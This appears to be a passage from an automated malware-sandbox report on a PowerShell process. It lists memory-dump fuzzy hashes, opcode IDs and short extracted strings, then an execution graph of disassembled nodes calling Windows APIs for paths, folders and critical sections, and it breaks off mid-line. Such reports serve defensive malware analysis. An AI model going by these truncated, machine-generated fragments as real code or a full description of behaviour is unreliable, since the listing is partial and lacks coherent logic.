                                                                                                                        • Instruction Fuzzy Hash: 6501E874D0020ACFC780DFA8C4859AEBBF0FF49204F5041A9D505DB321E730A941CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8f262b570e886d3ca1af7ad70e01ea6fc5a7ab27763e7d4394ed41d18a306191
                                                                                                                        • Instruction ID: 89b2d425a092bf0c6066552e1c8ed30c7e4914f5d3e176f2b67502dbb1beb5c9
                                                                                                                        • Opcode Fuzzy Hash: 8f262b570e886d3ca1af7ad70e01ea6fc5a7ab27763e7d4394ed41d18a306191
                                                                                                                        • Instruction Fuzzy Hash: D8F0E775E00109DFCB04DF99C890AADF7B2FB88314B248569D819E7665C736AC52CF90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7443749cae988a2d39c82f3ec2915762eab880080cc507caa6cd423bcb1f4330
                                                                                                                        • Instruction ID: ce13f71faefc612b02a15e02fe2959a82f44e518353ead67546d55bc45523da8
                                                                                                                        • Opcode Fuzzy Hash: 7443749cae988a2d39c82f3ec2915762eab880080cc507caa6cd423bcb1f4330
                                                                                                                        • Instruction Fuzzy Hash: 0AF01D36D105599FCB04DF94D8508EDBB75FF95310F518159E54537224EB30AA8ACBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6e10dda72cd5682aa150763446bf55c040aa61c1501f77b388be391dc6897e8
                                                                                                                        • Instruction ID: 499dd19b4f591181d5c296fff0c6dcefe210b15e341c4a1c3536f7ac0bfd598c
                                                                                                                        • Opcode Fuzzy Hash: c6e10dda72cd5682aa150763446bf55c040aa61c1501f77b388be391dc6897e8
                                                                                                                        • Instruction Fuzzy Hash: 98E0923A300064DBCB146FACB1094ED7BEEEB892767041057F90FC3B00CF69895286C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f0309c668a1c6cb260fc16ffbc56c475e55fbe1e33611e25e4253a0a1ade9138
                                                                                                                        • Instruction ID: d797a9198f700128b0f3983af9e71396db552e27303cbcfe70869fd3b99720b3
                                                                                                                        • Opcode Fuzzy Hash: f0309c668a1c6cb260fc16ffbc56c475e55fbe1e33611e25e4253a0a1ade9138
                                                                                                                        • Instruction Fuzzy Hash: A8F0A974E0020A8FC780DF68C485AAEBBF0FF49314F5041A9D509EB325D731A945CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9963d46862bd7d0ea3103bbe649f9e7f3fa8315c9c137e5f592daaa58cecadec
                                                                                                                        • Instruction ID: cf4ba34b913daa4062f110a6a4006871685ff3321a9477dcf4e0d71a166cde1d
                                                                                                                        • Opcode Fuzzy Hash: 9963d46862bd7d0ea3103bbe649f9e7f3fa8315c9c137e5f592daaa58cecadec
                                                                                                                        • Instruction Fuzzy Hash: E5E0C9B0D5430A9F8F48DFA894425FEBFF1AB08244F0085AEE819E2710D63406518FA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6917a386ee1faeb2188fcf896f087ff30c46165efa1d8ff52f40e1e096774610
                                                                                                                        • Instruction ID: 08d0014f223f2d2619654da32e8cf7271d0d17cddbfd375da672cdbfe5c23a69
                                                                                                                        • Opcode Fuzzy Hash: 6917a386ee1faeb2188fcf896f087ff30c46165efa1d8ff52f40e1e096774610
                                                                                                                        • Instruction Fuzzy Hash: 8AE092707007199FC9307FAD9C0958BBA59EF827707100F18E2624FBD0CB72A80187D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e59da7f21b07a35831924c83467a00084a8b09a2b8fd6ac8cb19e5648bce36d
                                                                                                                        • Instruction ID: 43ed6c56910d3c0f16c8360d007652b04aa85e2f69efaadd94b2cfce92d8d204
                                                                                                                        • Opcode Fuzzy Hash: 0e59da7f21b07a35831924c83467a00084a8b09a2b8fd6ac8cb19e5648bce36d
                                                                                                                        • Instruction Fuzzy Hash: D8E026B4D1820E9FCF48DFB995421BEFBF5AB48200F10896E9829E3350E63456518F95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 88d787abe51ebf87b1894412379f4458e050b39b6a9bc5c164cd1297c23ea38c
                                                                                                                        • Instruction ID: ac7ce32abac31478cd41b0d1ca3a1503479989a683290850b88935eb29302e92
                                                                                                                        • Opcode Fuzzy Hash: 88d787abe51ebf87b1894412379f4458e050b39b6a9bc5c164cd1297c23ea38c
                                                                                                                        • Instruction Fuzzy Hash: F6C012F5C94389AAD3169660A44D7F43FA55FC1344F084166A40F44062D2950495C911
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f9ae33fa71c180fcd683a02bef150546fb8e5b3db8d367870431ba3a9a74481
                                                                                                                        • Instruction ID: 272a26f2efbeb394ee345d70e5b8d3b4951bee98b1733ac5326283f4a2977deb
                                                                                                                        • Opcode Fuzzy Hash: 6f9ae33fa71c180fcd683a02bef150546fb8e5b3db8d367870431ba3a9a74481
                                                                                                                        • Instruction Fuzzy Hash: BCD01277300055DBCF015F96E9549BE7B6DEB882223089026F956C5911C6398421DB70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fa907efa6c79703edb2a57276a0e1c4009ad7364878bf8f8cee43e9b1d4f7d3e
                                                                                                                        • Instruction ID: 9916239fb566f5a86faa5e93771bb679660a071e952fd188a6eebfcd4298d68c
                                                                                                                        • Opcode Fuzzy Hash: fa907efa6c79703edb2a57276a0e1c4009ad7364878bf8f8cee43e9b1d4f7d3e
                                                                                                                        • Instruction Fuzzy Hash: 89D0C9B089520ADFEF20DFC4C6297AEBBB0BB00345F308419D002B5184CFB91A45CBD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b19aba90100b39851615d45f3b1ba8a08fe331d63d73346ead41a25b8ab5621d
                                                                                                                        • Instruction ID: 5dd0322cb715bb1325b02d6fb212e6bee9cb9f7b95119758f55e488a79c221b2
                                                                                                                        • Opcode Fuzzy Hash: b19aba90100b39851615d45f3b1ba8a08fe331d63d73346ead41a25b8ab5621d
                                                                                                                        • Instruction Fuzzy Hash: D1C08CF440A3CD86C300ABA0700C3B13E6C6700200F080040A12E01021C6905040CA73
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cd93ce9a03062adf2483661a7361b51503a00dec7d95ff926e009b2758dd835e
                                                                                                                        • Instruction ID: 6e2f651c466776cc4523612543e27e840688b2d769c248cee68e2fa31e8f5308
                                                                                                                        • Opcode Fuzzy Hash: cd93ce9a03062adf2483661a7361b51503a00dec7d95ff926e009b2758dd835e
                                                                                                                        • Instruction Fuzzy Hash: C0C09B3940C38179D6415651D905FBA7E645754351F008405F5D944550D5248490DB32
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-822670539
                                                                                                                        • Opcode ID: 902669adfaa67714c775a611e5b3f3788a99bf6d6131ee4e2c05490a0ab5132e
                                                                                                                        • Instruction ID: b91819f7efdb1c2dad71b5708e8515d8508f3f027f57dc1847e1546a243fac94
                                                                                                                        • Opcode Fuzzy Hash: 902669adfaa67714c775a611e5b3f3788a99bf6d6131ee4e2c05490a0ab5132e
                                                                                                                        • Instruction Fuzzy Hash: E9717BB2B8028A8FC7644E799C0096AB7E5AFE3211F14446FD609CF395DE32C848C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$U$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-3630219973
                                                                                                                        • Opcode ID: 1bae157b66b7707fa7e2bfee26b038a5c7aa59d0f4592263266ff2a1ba7c1b86
                                                                                                                        • Instruction ID: 56165812c587fb2f7017407ed8f69251e290eff175abd759913f09d48b3a2952
                                                                                                                        • Opcode Fuzzy Hash: 1bae157b66b7707fa7e2bfee26b038a5c7aa59d0f4592263266ff2a1ba7c1b86
                                                                                                                        • Instruction Fuzzy Hash: F4E16DB270425A8FC7648F699C1866ABBA1BFE5320F1484ABD405CB3D2DE76CD45C3E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Hbq$h]Hj$h]Hj$h]Hj$$^q$$^q$IHj
                                                                                                                        • API String ID: 0-3110959408
                                                                                                                        • Opcode ID: 4636e6f240d5e9ad2c43ddfdb208130d701ef775b2814dd314a8ce695b26b590
                                                                                                                        • Instruction ID: b0041e1726fd61932692eaac1d604f4b57cfa8fb2fff63b99fb5c7a2bff0c3ce
                                                                                                                        • Opcode Fuzzy Hash: 4636e6f240d5e9ad2c43ddfdb208130d701ef775b2814dd314a8ce695b26b590
                                                                                                                        • Instruction Fuzzy Hash: 98125E34B012148FDB15DB28C894AEEBBF6AF89305F1484E9D409AB365DF359D85CF81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$U$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-188354877
                                                                                                                        • Opcode ID: 2a1eabe2567aaa4cee860a80ccdb82efa8afcbe4bdffb9cc2eaa13de4de2963a
                                                                                                                        • Instruction ID: d58d6507cf9754afdce64d3ed94d43b2e69c35f080922177d8444345e071edd1
                                                                                                                        • Opcode Fuzzy Hash: 2a1eabe2567aaa4cee860a80ccdb82efa8afcbe4bdffb9cc2eaa13de4de2963a
                                                                                                                        • Instruction Fuzzy Hash: 215135B170430A8FCBA45E699C1076BBBB6AFE1324F18846AD445CB291EE36C8C1C7D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-578306960
                                                                                                                        • Opcode ID: bd1e6d353642386489a886004173a2cabc0c03d17e771e579d67d0f68c1eff96
                                                                                                                        • Instruction ID: 024d96da237e24299a725fdcd46a1281d9ee68274fa47c973423384922378626
                                                                                                                        • Opcode Fuzzy Hash: bd1e6d353642386489a886004173a2cabc0c03d17e771e579d67d0f68c1eff96
                                                                                                                        • Instruction Fuzzy Hash: 92914A72B0435D8FC7648EA9AC1866EBBA5EFE6330F14846BD905CB291DA31CC45C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-324510305
                                                                                                                        • Opcode ID: 991e32dd51dcd1060a3a767ffa198880a653d1a6b1a02af072b480d5d79c6078
                                                                                                                        • Instruction ID: 6435897d0d3f1ac69fe130c840b4c60abfcaf701a951eba4b3c0a848aa6de4ee
                                                                                                                        • Opcode Fuzzy Hash: 991e32dd51dcd1060a3a767ffa198880a653d1a6b1a02af072b480d5d79c6078
                                                                                                                        • Instruction Fuzzy Hash: 872135B2B4029ACFCB648E64CC449A9B7F4AFA2611B15415AEA08DF2A1C731CD04C7D0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @'=$@'=$L%=$$^q$$^q
                                                                                                                        • API String ID: 0-3082095298
                                                                                                                        • Opcode ID: 24346699db83e0a136e5ee86b16aedb3549b92b9a84aa33026503c15ca316845
                                                                                                                        • Instruction ID: 4ecb46c6d2e0204b568fa69cc9c729eaf30b5eb98678c29137d81812fdb8941a
                                                                                                                        • Opcode Fuzzy Hash: 24346699db83e0a136e5ee86b16aedb3549b92b9a84aa33026503c15ca316845
                                                                                                                        • Instruction Fuzzy Hash: 8001DBB36093844FC7764A286C20997AFA5AFF2720B158957D580CF3AAC964DC85C7E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                        • API String ID: 0-2049395529
                                                                                                                        • Opcode ID: ff23947ce30f88406979120f2731cc8c666e1e9459a9d2a21de126b20ab26dbf
                                                                                                                        • Instruction ID: 7b594d0bdc93122d8395d5a95022be10fa7014caa408dcdb3f09152bc74b1301
                                                                                                                        • Opcode Fuzzy Hash: ff23947ce30f88406979120f2731cc8c666e1e9459a9d2a21de126b20ab26dbf
                                                                                                                        • Instruction Fuzzy Hash: 4A8150F5B453898FDB548F689C045AA7BF1AF93215F1480ABD609CF292DB32C844C7E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tP^q$tP^q$$^q$$^q
                                                                                                                        • API String ID: 0-263804196
                                                                                                                        • Opcode ID: b6ffc44faea4a06951790e7687de48ca923dec8da55d297e2b21c71c74897207
                                                                                                                        • Instruction ID: 6fcaf816da3c2ec9b97905cdd581fa2c22709ac69d14ebc271a447c1c1b47e98
                                                                                                                        • Opcode Fuzzy Hash: b6ffc44faea4a06951790e7687de48ca923dec8da55d297e2b21c71c74897207
                                                                                                                        • Instruction Fuzzy Hash: 4D814771B102049FD7249E689C10BAABBE6AFD9310F24C06AE805DF391CA76DC51CBE1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$U$$^q
                                                                                                                        • API String ID: 0-1429445579
                                                                                                                        • Opcode ID: 2548ef297bbd1641280b83437d302bedeae4cae756e962ceba5a76d2d558f819
                                                                                                                        • Instruction ID: 33152af1727c97e1202e46fe186b93e722785677cc403a36a18dafd1af67bb09
                                                                                                                        • Opcode Fuzzy Hash: 2548ef297bbd1641280b83437d302bedeae4cae756e962ceba5a76d2d558f819
                                                                                                                        • Instruction Fuzzy Hash: 495145B171431A8FCB659B789C0076ABBB2AFE6214F14846AD505CB2D1DE3AC9C1C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-2125118731
                                                                                                                        • Opcode ID: 817f5ec40b6f944c94352bf145597fae494f448f943a7b768835adedccf8f688
                                                                                                                        • Instruction ID: 022c8d34e4ca798fe8c1c0d9b9d3b44a4f48f4a8499c917dc60e448bca6ad69d
                                                                                                                        • Opcode Fuzzy Hash: 817f5ec40b6f944c94352bf145597fae494f448f943a7b768835adedccf8f688
                                                                                                                        • Instruction Fuzzy Hash: 9B2107B271030A5BD7AC592E5C01B67A6965FE1714F25C42AA506CB3C5DD35C84583E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                        • API String ID: 0-2049395529
                                                                                                                        • Opcode ID: 023f2eec0f98f7e623b7f2b413f69b9dad8f5e1bbf025835367fc874418959b7
                                                                                                                        • Instruction ID: 381cacfd5db68283241c146211330602912dd48a355898726f3d09961d1dc06c
                                                                                                                        • Opcode Fuzzy Hash: 023f2eec0f98f7e623b7f2b413f69b9dad8f5e1bbf025835367fc874418959b7
                                                                                                                        • Instruction Fuzzy Hash: B101DF61B5D3CA4FC32B16681C602556FB25FD3911B2A40EBC081CF2ABCD198C4983E3

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:5.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:7.5%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:100
                                                                                                                        execution_graph 76209 11025b00 76210 1110c760 76209->76210 76211 1110c781 76210->76211 76212 1110c76c 76210->76212 76213 1110c794 76210->76213 76218 1110c6b0 76211->76218 76212->76213 76215 1110c6b0 7 API calls 76212->76215 76217 1110c775 76215->76217 76216 1110c788 76219 1110c6f4 EnterCriticalSection 76218->76219 76220 1110c6df InitializeCriticalSection 76218->76220 76221 1110c715 76219->76221 76220->76219 76222 1110c743 LeaveCriticalSection 76221->76222 76224 1110c650 76221->76224 76222->76216 76225 1110c667 EnterCriticalSection 76224->76225 76226 1110c65e GetCurrentThreadId 76224->76226 76227 1110c67e 76225->76227 76226->76225 76228 1110c685 LeaveCriticalSection 76227->76228 76229 1110c698 LeaveCriticalSection 76227->76229 76228->76221 76229->76221 76230 11141510 76232 11141523 std::ios_base::_Ios_base_dtor 76230->76232 76234 11141545 GetLastError 76232->76234 76235 1114158a std::ios_base::_Ios_base_dtor 76232->76235 76239 11141430 ExpandEnvironmentStringsA 76232->76239 76252 1116076b 76232->76252 76234->76232 76236 11141550 Sleep 76234->76236 76237 1116076b std::_Mutex::_Mutex 139 API calls 76236->76237 76238 11141562 76237->76238 76238->76232 76238->76235 76240 11141467 76239->76240 76241 1114149e 76240->76241 76242 11141484 std::_Mutex::_Mutex 76240->76242 76250 11141474 76240->76250 76272 11141240 76241->76272 76245 11141495 GetModuleFileNameA 76242->76245 76246 111414a4 76245->76246 76296 11080be0 76246->76296 76247 111414f8 76264 1115e4d1 76247->76264 76255 1113e8f0 76250->76255 76251 11141506 76251->76232 76599 111606af 76252->76599 76254 1116077d 76254->76232 76256 1113e8fa 76255->76256 76257 1113e8fc 76255->76257 76256->76247 76300 1110c4a0 76257->76300 76259 1113e922 76260 1113e92b _strncpy 76259->76260 76261 1113e949 76259->76261 76260->76247 76306 110290f0 261 API calls 2 library calls 76261->76306 76265 1115e4d9 76264->76265 76266 1115e4db IsDebuggerPresent 76264->76266 76265->76251 76308 11173e07 76266->76308 76269 11168469 SetUnhandledExceptionFilter UnhandledExceptionFilter 76270 1116848e GetCurrentProcess TerminateProcess 76269->76270 76271 11168486 __call_reportfault 76269->76271 76270->76251 76271->76270 76273 11141262 76272->76273 76278 11141279 std::_Mutex::_Mutex 76272->76278 76330 110290f0 261 API calls 2 library calls 76273->76330 76276 11141407 76277 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 76276->76277 76280 11141423 76277->76280 76278->76276 76279 111412ac GetModuleFileNameA 76278->76279 76281 11080be0 std::_Mutex::_Mutex IsDBCSLeadByte 76279->76281 76280->76246 76282 111412c1 76281->76282 76283 111412d1 SHGetFolderPathA 76282->76283 76284 111413b8 76282->76284 76285 111412fe 76283->76285 76286 1114131d SHGetFolderPathA 76283->76286 76287 1113e8f0 std::_Mutex::_Mutex 258 API calls 76284->76287 76285->76286 76289 11141304 76285->76289 76290 11141352 std::_Mutex::_Mutex 76286->76290 76287->76276 76331 110290f0 261 API calls 2 library calls 76289->76331 76309 1102a250 76290->76309 76297 11080bf3 _strrchr 76296->76297 76299 11080c0a std::_Mutex::_Mutex 76297->76299 76598 11080a30 IsDBCSLeadByte 76297->76598 76299->76250 76301 1110c4ae 76300->76301 76302 1110c4b7 76301->76302 76303 1110c4ce _memset 76301->76303 76307 110290f0 261 API calls 2 library calls 76302->76307 76303->76259 76308->76269 76332 11028290 76309->76332 76311 1102a25e 76312 11140ce0 76311->76312 76313 11140d6a 76312->76313 76314 11140ceb 76312->76314 76313->76284 76314->76313 76314->76314 76315 11140cfb GetFileAttributesA 76314->76315 76316 11140d15 76315->76316 76317 11140d07 76315->76317 76571 11161dd7 76316->76571 76317->76284 76320 11080be0 std::_Mutex::_Mutex IsDBCSLeadByte 76321 11140d26 76320->76321 76322 11140d43 76321->76322 76323 11140ce0 std::_Mutex::_Mutex 35 API calls 76321->76323 76322->76284 76324 11140d36 76323->76324 76325 11140d4c 76324->76325 76326 11140d3e 76324->76326 76328 1115f3b5 _free 23 API calls 76325->76328 76327 1115f3b5 _free 23 API calls 76326->76327 76327->76322 76329 11140d51 CreateDirectoryA 76328->76329 76329->76322 76333 110282b3 76332->76333 76334 110288fb 76332->76334 76335 11028370 GetModuleFileNameA 76333->76335 76345 110282e8 76333->76345 76336 11028997 76334->76336 76337 110289aa 76334->76337 76338 11028391 _strrchr 76335->76338 76339 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 76336->76339 76340 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 76337->76340 76343 1116076b std::_Mutex::_Mutex 139 API calls 76338->76343 76341 110289a6 76339->76341 76342 110289bb 76340->76342 76341->76311 76342->76311 76344 1102836b 76343->76344 76344->76334 76359 11026500 49 API calls 2 library calls 76344->76359 76347 1116076b std::_Mutex::_Mutex 139 API calls 76345->76347 76347->76344 76348 110283e4 76356 11028865 76348->76356 76360 1115f5b7 76348->76360 76351 110283f5 std::_Mutex::_Mutex 76351->76356 76364 11026500 49 API calls 2 library calls 76351->76364 76353 11028430 std::_Mutex::_Mutex 76353->76356 76365 11026500 49 API calls 2 library calls 76353->76365 76355 11028453 std::_Mutex::_Mutex 76355->76356 76358 11160e4e 81 API calls _LanguageEnumProc@4 76355->76358 76366 11026500 49 API calls 2 library calls 76355->76366 76356->76356 76367 11160535 76356->76367 76358->76355 76359->76348 76361 1115f5a1 76360->76361 76380 1115fe1b 76361->76380 76364->76353 76365->76355 76366->76355 76368 11160541 __write 76367->76368 76369 11160553 76368->76369 76370 11160568 76368->76370 76465 11165abf 23 API calls __getptd_noexit 76369->76465 76377 11160563 __write 76370->76377 76445 11167769 76370->76445 76372 11160558 76466 1116a6d4 11 API calls _sprintf 76372->76466 76375 11160581 76449 111604c8 76375->76449 76377->76334 76381 1115fe34 76380->76381 76384 1115fbf0 76381->76384 76396 1115fb69 76384->76396 76386 1115fc14 76404 11165abf 23 API calls __getptd_noexit 76386->76404 76389 1115fc19 76405 1116a6d4 11 API calls _sprintf 76389->76405 76392 1115fc4a 76393 1115fc91 76392->76393 76406 1116d3d5 75 API calls 3 library calls 76392->76406 76395 1115f5b2 76393->76395 76407 11165abf 23 API calls __getptd_noexit 76393->76407 76395->76351 76397 1115fb7c 76396->76397 76403 1115fbc9 76396->76403 76408 11167f85 76397->76408 76400 1115fba9 76400->76403 76426 1116cf14 64 API calls 5 library 